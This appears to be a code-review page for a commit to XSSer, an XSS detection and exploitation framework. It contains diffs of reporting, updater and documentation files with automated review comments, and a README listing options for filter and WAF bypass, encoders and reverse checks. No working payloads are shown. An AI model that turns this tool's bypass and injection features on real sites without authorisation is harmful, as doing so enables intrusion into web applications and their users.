                 if dcp_vulnerable_host[0]["payload"] == line[4] and dcp_vulnerable_host[0]["target"] == line[6] and self.dcp_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "Data Control Protocol injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DCP (Data Control Protocol) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "dom":
             elif line[2] == "dom":
                 self.dom_found = self.dom_found +1
                 self.dom_found = self.dom_found +1
                 dom_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 dom_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if dom_vulnerable_host[0]["payload"] == line[4] and dom_vulnerable_host[0]["target"] == line[6] and self.dom_found > 1:
                 if dom_vulnerable_host[0]["payload"] == line[4] and dom_vulnerable_host[0]["target"] == line[6] and self.dom_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "Document Object Model injections!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "DOM (Document Object Model) " + str(line[6]) + "/"+str(line[4])
             elif line[2] == "ind":
             elif line[2] == "ind":
                 self.ind_found = self.ind_found +1
                 self.ind_found = self.ind_found +1
                 ind_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 ind_vulnerable_host = [{"payload":str(line[4]), "target":str(line[6])}]
                 if ind_vulnerable_host[0]["payload"] == line[4] and ind_vulnerable_host[0]["target"] == line[6] and self.ind_found > 1:
                 if ind_vulnerable_host[0]["payload"] == line[4] and ind_vulnerable_host[0]["target"] == line[6] and self.ind_found > 1:
                     pass
                     pass
                 else:
                 else:
-                    aurl.text = "HTTP Response Splitting Induced code!! " + str(line[6]) + "/"+str(line[4])
+                    aurl.text = "HTTPrs (HTTP Response Splitting) " + str(line[6]) + "/"+str(line[4])
             else:
             else:
                 if aurl == None:
                 if aurl == None:
                     pass
                     pass
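Review bot: the new label "HTTPrs (HTTP Response Splitting)" uses a different abbreviation from the rest of the project, which spells it `HTTPsr` (the fuzzing module name and the `Total vectors:` banner in options.py); pick one spelling so reports can be grepped consistently. The relabelled lines are also uneven: XSR, XSA and Cookie end in "Injection!" while DCP, DOM and HTTPrs are bare parenthesised names, so a single format such as `"<name>: " + target + "/" + payload` would keep the entries uniform.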
@@ -160,14 +153,43 @@ class xml_reporting(object):
             if line[2] == "xsr" or line[2] == "xsa" or line[2] == "coo" or line[2] == "dcp" or line[2] == "dom" or line[2] == "ind":
             if line[2] == "xsr" or line[2] == "xsa" or line[2] == "coo" or line[2] == "dcp" or line[2] == "dom" or line[2] == "ind":
                 pass
                 pass
             else:
             else:
-                browsers = ET.SubElement(attack, "browsers")
+                browsers = ET.SubElement(attack, "vulnerable")
                 browsers.text = line[1]
                 browsers.text = line[1]
-                method = ET.SubElement(attack, "method")
+                method = ET.SubElement(attack, "vector")
                 method.text = line[2]
                 method.text = line[2]
-
         if not self.instance.hash_found:
         if not self.instance.hash_found:
-            msg = ET.SubElement(results, "message")
-            msg.text = "Failed injection(s): " +str(''.join([u[0] for u in self.instance.hash_notfound])) 
+            msg = ET.SubElement(results, "results")
+            msg.text = ""
+            for h in self.instance.hash_notfound:
+                if h[2] == 'heuristic':
+                    if not h[4]:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                elif h[2] == 'hashing check':
+                    if not h[4]:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[3]) + "\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n" + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                    else:
+                        msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[3]) + " ]\n\n[!] Method: " + str(h[2]) + "\n\n[*] Payload: \n\n " + str(h[5]) + "\n\n[!] Status:\n\n FILTERED!\n\n"
+                else:
+                    if h[4]:
+                        if h[2] == "XSA":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + " | " + str(h[4]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                    else:
+                        if h[2] == "XSA": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: User-Agent Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "XSR": 
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Referer Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        elif h[2] == "COO":
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: Cookie Injection" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                        else:
+                            msg.text = msg.text + "[+] Target: " + str(h[6]) + "\n[+] Vector: [ " + str(h[2]) + " ]\n\n[!] Method: URL" + "\n[*] Hash: " + str(h[3]) + " \n\n[*] Payload: \n\n " + str(h[0]) + "\n\n[!] Vulnerable: " + str(h[1]) + "\n\n[!] Status: XSS FAILED!\n\n"
+                msg.text = msg.text + "="*75 + "\n\n"
         tree = ET.ElementTree(root)
         tree = ET.ElementTree(root)
         tree.write(filename)
         tree.write(filename)
-
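Review bot: renaming the XML elements `browsers` to `vulnerable` and `method` to `vector` changes the report schema, so any consumer parsing the old `<browsers>` and `<method>` elements silently loses those fields; either keep the old names or record the schema change in the CHANGELOG, and rename the Python variables too, since `browsers = ET.SubElement(attack, "vulnerable")` now misleads. In the failed-injection block, `ET.SubElement(results, "results")` nests a `<results>` element inside `results`, where the previous `message` name was clearer, and the whole list is written as one preformatted text blob instead of one child element per failure with `target`, `vector`, `method`, `hash` and `payload` sub-elements, which is what makes the XML export worth having over `XSSreport.raw`. The eight string-building branches differ only in the method label and in whether `h[4]` is set, so one helper taking those fields would replace them; while doing that, fix the `not h[4]` branches of the `heuristic` and `hashing check` cases, which open `[ ` after `Vector:` without the closing ` ]` every other branch emits.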

+ 2 - 4
xsser/core/randomip.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 2 - 4
xsser/core/reporter.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 19 - 9
xsser/core/threadpool.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -121,19 +119,31 @@ def makeRequests(callable_, args_list, callback=None,
     """
     """
     requests = []
     requests = []
     for item in args_list:
     for item in args_list:
+        is_crawling = False
+        try:
+            psy = item[3] # black magic!
+            is_crawling = True
+        except:
+            is_crawling = False
+
         if isinstance(item, tuple):
         if isinstance(item, tuple):
             requests.append(
             requests.append(
                 WorkRequest(callable_, item[0], item[1], callback=callback,
                 WorkRequest(callable_, item[0], item[1], callback=callback,
                     exc_callback=exc_callback)
                     exc_callback=exc_callback)
             )
             )
         else:
         else:
-            requests.append(
-                WorkRequest(callable_, item, None, callback=callback,
-                    exc_callback=exc_callback)
-            )
+            if is_crawling == True:
+                requests.append(
+                    WorkRequest(callable_, [item], None, callback=callback,
+                        exc_callback=exc_callback)
+                )
+            else:
+                requests.append(
+                    WorkRequest(callable_, item, None, callback=callback,
+                        exc_callback=exc_callback)
+                )
     return requests
     return requests
 
 
-
 # classes
 # classes
 class WorkerThread(threading.Thread):
 class WorkerThread(threading.Thread):
     """Background thread connected to the requests/results queues.
     """Background thread connected to the requests/results queues.

+ 2 - 4
xsser/core/tokenhub.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 2 - 4
xsser/core/twsupport.py

@@ -2,11 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-$Id$
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-This file is part of the xsser project, http://xsser.03c8.net
-
-Copyright (c) 2011/2016 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free

+ 11 - 8
xsser/core/update.py

@@ -2,9 +2,9 @@
 # -*- coding: utf-8 -*-"
 # -*- coding: utf-8 -*-"
 # vim: set expandtab tabstop=4 shiftwidth=4:
 # vim: set expandtab tabstop=4 shiftwidth=4:
 """
 """
-This file is part of the xsser project, https://xsser.03c8.net
+This file is part of the XSSer project, https://xsser.03c8.net
 
 
-Copyright (c) 2011/2016/2018 psy <epsylon@riseup.net>
+Copyright (c) 2010/2019 | psy <epsylon@riseup.net>
 
 
 xsser is free software; you can redistribute it and/or modify it under
 xsser is free software; you can redistribute it and/or modify it under
 the terms of the GNU General Public License as published by the Free
 the terms of the GNU General Public License as published by the Free
@@ -28,17 +28,20 @@ class Updater(object):
     Update XSSer automatically from a .git repository
     Update XSSer automatically from a .git repository
     """     
     """     
     def __init__(self):
     def __init__(self):
-        GIT_REPOSITORY = "https://github.com/epsylon/xsser"
-        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '../../', ''))
+        GIT_REPOSITORY = "https://code.03c8.net/epsylon/xsser"
+        GIT_REPOSITORY2 = "https://github.com/epsylon/xsser"
+        rootDir = os.path.abspath(os.path.join(os.path.dirname( __file__ ), '..', ''))
         if not os.path.exists(os.path.join(rootDir, ".git")):
         if not os.path.exists(os.path.join(rootDir, ".git")):
-            print "Not any .git repository found!\n"
+            print "[Error] Not any .git repository found!\n"
             print "="*30
             print "="*30
             print "\nTo have working this feature, you should clone XSSer with:\n"
             print "\nTo have working this feature, you should clone XSSer with:\n"
-            print "$ git clone %s" % GIT_REPOSITORY, "\n"
+            print "$ git clone %s" % GIT_REPOSITORY
+            print "\nAlso you can try this other mirror:\n"
+            print "$ git clone %s" % GIT_REPOSITORY2 + "\n"
         else:
         else:
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             checkout = execute("git checkout . && git pull", shell=True, stdout=PIPE, stderr=PIPE).communicate()[0]
             print checkout
             print checkout
             if not "Already up-to-date" in checkout:
             if not "Already up-to-date" in checkout:
-                print "Congratulations!! XSSer has been updated... ;-)"
+                print "Congratulations!! XSSer has been updated... ;-)\n"
             else:
             else:
-                print "Your XSSer doesn't need to be updated... ;-)"
+                print "Your XSSer doesn't need to be updated... ;-)\n"
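Review bot: the success message is wrong whenever `git pull` fails: `stderr` is captured but never read and only `stdout` is inspected, so a failed pull (network error, merge conflict, detached HEAD) yields an empty `checkout`, the `"Already up-to-date"` substring is absent, and the user is told `XSSer has been updated`. Check the return code of the process object `execute(...)` returns after `communicate()` and print `stderr` on failure. The substring test is brittle on its own as well: recent git prints `Already up to date.` without hyphens and a localized git prints something else, so compare `git rev-parse HEAD` before and after the pull instead. `git checkout .` also silently discards any local modifications before pulling; say so in the output. Finally, this fetches and runs whatever the remote branch currently serves, with no tag or signature check, which deserves a sentence in INSTALL given that the same commit tells users to install with `sudo python setup.py install`.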

+ 41 - 0
doc/AUTHOR

@@ -0,0 +1,41 @@
+========================
+
+ nick: psy (epsylon)
+  
+  <epsylon@riseup.net> 
+
+ web: https://03c8.net
+
+=======================
+
+ code:
+
+  https://code.03c8.net/epsylon
+
+=======================
+
+ software/projects:
+
+ - AnonTwi: Tool for OAuth2 applications (such as: GNUSocial, Twitter) that provides different layers of privacy/encryption.
+ - Bordercheck: Tool to visualize 'real-time' on a world map the geolocation of data when surfing the web.
+ - CIntruder: Tool to bypass captchas using OCR (Optical Character Recognition) bruteforcing methods.
+ - Collatz: Tool to simulate the Collatz's conjeture.
+ - DieKunstDerFuge: Video on different topics related to hacktivism recorded during 2013 from an intimate narrative perspective.
+ - ECOin: Decentralized key/value registration and transfer system based on Bitcoin technology (a cryptocurrency).
+ - Goldbach: Tool to simulate the Goldbach's conjeture.
+ - Lorea: Social networking autonomous project to build a distributed, encrypted and federated network.
+ - Orb: Tool for massive footprinting.
+ - pArAnoIA-Browser: Tool designed to surf the Internet using some "paranoic" methods.
+ - Propagare: Tool for extraction, organization and semantic analysis of newspapers.
+ - PyAISnake: Tool to train AI models on solve spatial problems through the classic video game "snake".
+ - PyDog4Apache: Tool to sneak logs from Apache web server.
+ - UFONet: Denial of Service [DDoS & DoS attacks] Toolkit (a botnet of botnets).
+ - XSSer: Automatic -framework- to detect, exploit and report XSS vulnerabilities.
+
+=======================
+
+ BTC: 
+
+  19aXfJtoYJUoXEZtjNwsah2JKN9CK5Pcjw
+
+========================
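Review bot: two typos in the projects list: `conjeture` should be `conjecture` in both the Collatz and Goldbach entries, and the PyAISnake entry should read `to train AI models to solve spatial problems`.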

+ 28 - 9
xsser/doc/CHANGELOG

@@ -1,7 +1,26 @@
 ================================================================
 ================================================================
-Changelog: XSSer v1.7.2 (xsser.03c8.net)
+Changelog: XSSer v1.8.1 (https://xsser.03c8.net)
 ==============================
 ==============================
 
 
+=================
+September 20, 2019:
+=================
+
+- Re-factorized: Main(), Hashers, Payloaders, Reporters, Exporters...
+- Removed: deprecated features
+- Removed: --no-head (from default)
+- Added: new options: --check-tor, --auto-set, --auto-info and --auto-random
+- Added: new search engines: duck, startpage
+- Added: new dorks (Total: 40)
+- Added: Anti-antiXSS Firewall rules (Bypassers provided for: Firefox, IE, Opera, Chrome)
+- Modified/Updated: DCP (Data Control Protocol) method
+- Modified/Updated: HTTPrs (HTTP Response Splitting) injections
+- Modified/Updated: GTK+
+- Modified/Updated: Crawler/Spidering
+- Updated: "Extra Attacks" (XSA, XSR, COOKIE)
+- Updated: Automatic XSS vectors list (Total: 1326 = XSS: 1293 + DCP: 16 + DOM: 6 + HTTPsr: 11)
+- Updated: XSSer tool updater
+- Updated: Documentation
 
 
 =================
 =================
 April 12, 2018:
 April 12, 2018:
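Review bot: the HTTP Response Splitting technique is abbreviated two ways inside this hunk, `HTTPrs` in the `Modified/Updated` entry and `HTTPsr` in the vector count, and `xml_exporter.py` in this same commit emits `HTTPrs (HTTP Response Splitting)`; pick one spelling and use it everywhere. `Re-factorized` should be `Refactored`, and `Removed: --no-head (from default)` is ambiguous: say whether the option was removed or is merely no longer on by default (the new README help lists `--head` and no `--no-head`). The vector total is consistent (1293 + 16 + 6 + 11 = 1326).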
@@ -107,8 +126,8 @@ September 22, 2010:
 - New dorker engines (total 10) 
 - New dorker engines (total 10) 
 - Core clean 
 - Core clean 
 - Bugfixing 
 - Bugfixing 
-- Social Networking auto-publisher -
-- Started -federated- XSS (full disclosure) pentesting botnet.
+- Social Networking auto-publisher
+- Started -federated- XSS (full disclosure) pentesting botnet
 
 
     http://identi.ca/xsserbot01
     http://identi.ca/xsserbot01
     http://twitter.com/xsserbot01
     http://twitter.com/xsserbot01
@@ -125,7 +144,7 @@ August 20, 2010:
 - Post-processing payloading 
 - Post-processing payloading 
 - DOM Shadows! 
 - DOM Shadows! 
 - Cookie injector 
 - Cookie injector 
-- Browser DoS (Denegation of Service).
+- Browser DoS (Denegation of Service)
 
 
 =================
 =================
 July 1, 2010:
 July 1, 2010:
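Review bot: while this line is being touched, `Denegation of Service` should read `Denial of Service`; the same wording appears in the new README example (`exploit a DoS (Denegation Of Service)`).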
@@ -133,29 +152,29 @@ July 1, 2010:
 
 
 - Dorking 
 - Dorking 
 - Crawling 
 - Crawling 
-- IP DWORD + Core clean.
+- IP DWORD + Core clean
 
 
 =================
 =================
 April 19, 2010:
 April 19, 2010:
 =================
 =================
 
 
-- HTTPS implemented + patched bugs.
+- HTTPS implemented + patched bugs
 
 
 =================
 =================
 March 22, 2010:
 March 22, 2010:
 =================
 =================
 
 
-- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer.
+- Added "inject your own payload" option. Can be used with all character encoding -bypassers- of XSSer
 
 
 =================
 =================
 March 18, 2010:
 March 18, 2010:
 =================
 =================
 
 
-- Added attack payloads to fuzzer (62 different XSS injections).
+- Added attack payloads to fuzzer (62 different XSS injections)
 
 
 =================
 =================
 March 16, 2010:
 March 16, 2010:
 =================
 =================
 
 
-- Added new payload encoders to bypass filters.
+- Added new payload encoders to bypass filters
 
 

xsser/doc/COPYING → doc/COPYING


+ 16 - 18
xsser/doc/INSTALL

@@ -1,11 +1,23 @@
 ============================================
 ============================================
-XSSer - Cross Site Scripter - 2011/2018
+Introduction:
 ============================================
 ============================================
 
 
 Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
 Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
 
 
-===================
-How-to INSTALL:
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
++ INSTALL: AUTO
+==================
+
+  sudo python setup.py install
+
+================================================================
++ INSTALL: MANUAL
 ===================
 ===================
 
 
 XSSer runs on many platforms. It requires Python and the following libraries:
 XSSer runs on many platforms. It requires Python and the following libraries:
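Review bot: `sudo python setup.py install` names no Python version, yet the code in this commit uses Python 2 `print` statements (see `update.py`), so a user whose `python` is 3.x gets a SyntaxError at install or first run; write `python2` explicitly and state the required major version in the `It requires Python` sentence. The version string `XSSer v1.8[1]` is also odd; the CHANGELOG in this commit calls the release `v1.8.1`.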
@@ -30,19 +42,5 @@ On other systems such as: Kali, Ubuntu, ArchLinux, ParrotSec, Fedora, etc... als
        * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
        * PyBeautifulSoup: https://pypi.python.org/pypi/BeautifulSoup
        * PyGeoIP: https://pypi.python.org/pypi/GeoIP
        * PyGeoIP: https://pypi.python.org/pypi/GeoIP
 
 
-=========
-
-Please report any problems you encounter using/installing XSSer to the xsser-users mailing-list:
-
-    - xsser-users@lists.sourceforge.net
-
-Or write directly to:
-
-    - epsylon@riseup.net
-
-Website: 
-
-    - https://xsser.03c8.net
-
-=========
+================================================================
 
 
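Review bot: this hunk removes the only place the document told users where to report problems (the mailing list, the maintainer address and the website) and replaces it with a bare rule line; keep at least the website and one contact or issue-tracker address, since a scanner like this receives bug and false-positive reports that need a destination.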

+ 2 - 2
xsser/doc/MANIFESTO

@@ -6,6 +6,6 @@ The Mosquito or Mosquito alarm (marketed as the Beethoven in France and the Swis
 
 
 The device is marketed as a safety and security tool for preventing youths from congregating in specific areas. As such, it is promoted to reduce anti-social behaviour such as loitering, graffiti, vandalism, drug use, drug distribution, and violence. In the UK, over 3,000 have been sold, mainly for use outside shops and near transport hubs. The device is also sold in Australia, France, Denmark, Italy, Germany, Switzerland, Canada and the USA. 
 The device is marketed as a safety and security tool for preventing youths from congregating in specific areas. As such, it is promoted to reduce anti-social behaviour such as loitering, graffiti, vandalism, drug use, drug distribution, and violence. In the UK, over 3,000 have been sold, mainly for use outside shops and near transport hubs. The device is also sold in Australia, France, Denmark, Italy, Germany, Switzerland, Canada and the USA. 
 
 
+====================================
 The code doesn't obey the system!
 The code doesn't obey the system!
-
-BBZzzzzzzzZZZZZZZZzzzz....
+====================================

+ 350 - 0
doc/README

@@ -0,0 +1,350 @@
+================================================================
+Introduction:
+==============================
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.
+
+================================================================
+Current Version:
+==============================
+
+XSSer v1.8[1]: "The Hive!" (2010/2019) // [https://xsser.03c8.net]
+
+================================================================
+Options and features:
+==============================
+ 
+Usage: 
+
+xsser [OPTIONS] [--all <url> |-u <url> |-i <file> |-d <dork> (options)|-l ] [-g <get> |-p <post> |-c <crawl> (options)]
+[Request(s)] [Checker(s)] [Vector(s)] [Anti-antiXSS/IDS] [Bypasser(s)] [Technique(s)] [Final Injection(s)] [Reporting] {Miscellaneous}
+
+Cross Site "Scripter" is an automatic -framework- to detect, exploit and
+report XSS vulnerabilities in web-based applications.
+
+Options:
+  --version             show program's version number and exit
+  -h, --help            show this help message and exit
+  -s, --statistics      show advanced statistics output results
+  -v, --verbose         active verbose mode output results
+  --gtk                 launch XSSer GTK Interface
+  --wizard              start Wizard Helper!
+
+  *Special Features*:
+    You can set Vector(s) and Bypasser(s) to build complex scripts for XSS
+    code embedded. XST allows you to discover if target is vulnerable to
+    'Cross Site Tracing' [CAPEC-107]:
+
+    --imx=IMX           IMX - Create an image with XSS (--imx image.png)
+    --fla=FLASH         FLA - Create a flash movie with XSS (--fla movie.swf)
+    --xst=XST           XST - Cross Site Tracing (--xst http(s)://host.com)
+
+  *Select Target(s)*:
+    At least one of these options must to be specified to set the source
+    to get target(s) urls from:
+
+    --all=TARGET        Automatically audit an entire target
+    -u URL, --url=URL   Enter target to audit
+    -i READFILE         Read target(s) urls from file
+    -d DORK             Search target(s) using a query (ex: 'news.php?id=')
+    -l                  Search from a list of 'dorks'
+    --De=DORK_ENGINE    Use this search engine (default: yahoo)
+    --Da                Search massively using all search engines
+
+  *Select type of HTTP/HTTPS Connection(s)*:
+    These options can be used to specify which parameter(s) we want to use
+    as payload(s). Set 'XSS' as keyword on the place(s) that you want to
+    inject:
+
+    -g GETDATA          Send payload using GET (ex: '/menu.php?id=XSS')
+    -p POSTDATA         Send payload using POST (ex: 'foo=1&bar=XSS')
+    -c CRAWLING         Number of urls to crawl on target(s): 1-99999
+    --Cw=CRAWLER_WIDTH  Deeping level of crawler: 1-5 (default: 2)
+    --Cl                Crawl only local target(s) urls (default: FALSE)
+
+  *Configure Request(s)*:
+    These options can be used to specify how to connect to the target(s)
+    payload(s). You can choose multiple:
+
+    --head              Send a HEAD request before start a test
+    --cookie=COOKIE     Change your HTTP Cookie header
+    --drop-cookie       Ignore Set-Cookie header from response
+    --user-agent=AGENT  Change your HTTP User-Agent header (default: SPOOFED)
+    --referer=REFERER   Use another HTTP Referer header (default: NONE)
+    --xforw             Set your HTTP X-Forwarded-For with random IP values
+    --xclient           Set your HTTP X-Client-IP with random IP values
+    --headers=HEADERS   Extra HTTP headers newline separated
+    --auth-type=ATYPE   HTTP Authentication type (Basic, Digest, GSS or NTLM)
+    --auth-cred=ACRED   HTTP Authentication credentials (name:password)
+    --check-tor         Check to see if Tor is used properly
+    --proxy=PROXY       Use proxy server (tor: http://localhost:8118)
+    --ignore-proxy      Ignore system default HTTP proxy
+    --timeout=TIMEOUT   Select your timeout (default: 30)
+    --retries=RETRIES   Retries when connection timeout (default: 1)
+    --threads=THREADS   Maximum number of concurrent requests (default: 5)
+    --delay=DELAY       Delay in seconds between each request (default: 0)
+    --tcp-nodelay       Use the TCP_NODELAY option
+    --follow-redirects  Follow server redirection responses (302)
+    --follow-limit=FLI  Set limit for redirection requests (default: 50)
+
+  *Checker Systems*:
+    These options are useful to know if your target is using filters
+    against XSS attacks:
+
+    --hash              Send a hash to check if target is repeating content
+    --heuristic         Discover parameters filtered by using heuristics
+    --discode=DISCODE   Set code on reply to discard an injection
+    --checkaturl=ALT    Check reply using: <alternative url> [aka BLIND-XSS]
+    --checkmethod=ALTM  Check reply using: GET or POST (default: GET)
+    --checkatdata=ALD   Check reply using: <alternative payload>
+    --reverse-check     Establish a reverse connection from target to XSSer
+    --reverse-open      Open a web browser when a reverse check is established
+
+  *Select Vector(s)*:
+    These options can be used to specify injection(s) code. Important if
+    you don't want to inject a common XSS vector used by default. Choose
+    only one option:
+
+    --payload=SCRIPT    OWN   - Inject your own code
+    --auto              AUTO  - Inject a list of vectors provided by XSSer
+
+  *Select Payload(s)*:
+    These options can be used to set the list of vectors provided by
+    XSSer. Choose only if required:
+
+    --auto-set=FZZ_NUM  ASET  - Limit of vectors to inject (default: 1293)
+    --auto-info         AINFO - Select ONLY vectors with INFO (defaul: FALSE)
+    --auto-random       ARAND - Set random to order (default: FALSE)
+
+  *Anti-antiXSS Firewall rules*:
+    These options can be used to try to bypass specific WAF/IDS products
+    and some anti-XSS browser filters. Choose only if required:
+
+    --Phpids0.6.5       PHPIDS (0.6.5) [ALL]
+    --Phpids0.7         PHPIDS (0.7) [ALL]
+    --Imperva           Imperva Incapsula [ALL]
+    --Webknight         WebKnight (4.1) [Chrome]
+    --F5bigip           F5 Big IP [Chrome + FF + Opera]
+    --Barracuda         Barracuda WAF [ALL]
+    --Modsec            Mod-Security [ALL]
+    --Quickdefense      QuickDefense [Chrome]
+    --Firefox           Firefox 12 [& below]
+    --Chrome            Chrome 19 & Firefox 12 [& below]
+    --Opera             Opera 10.5 [& below]
+    --Iexplorer         IExplorer 9 & Firefox 12 [& below]
+
+  *Select Bypasser(s)*:
+    These options can be used to encode vector(s) and try to bypass
+    possible anti-XSS filters. They can be combined with other techniques:
+
+    --Str               Use method String.FromCharCode()
+    --Une               Use Unescape() function
+    --Mix               Mix String.FromCharCode() and Unescape()
+    --Dec               Use Decimal encoding
+    --Hex               Use Hexadecimal encoding
+    --Hes               Use Hexadecimal encoding with semicolons
+    --Dwo               Encode IP addresses with DWORD
+    --Doo               Encode IP addresses with Octal
+    --Cem=CEM           Set different 'Character Encoding Mutations'
+                        (reversing obfuscators) (ex: 'Mix,Une,Str,Hex')
+
+  *Special Technique(s)*:
+    These options can be used to inject code using different XSS
+    techniques and fuzzing vectors. You can choose multiple:
+
+    --Coo               COO - Cross Site Scripting Cookie injection
+    --Xsa               XSA - Cross Site Agent Scripting
+    --Xsr               XSR - Cross Site Referer Scripting
+    --Dcp               DCP - Data Control Protocol injections
+    --Dom               DOM - Document Object Model injections
+    --Ind               IND - HTTP Response Splitting Induced code
+
+  *Select Final injection(s)*:
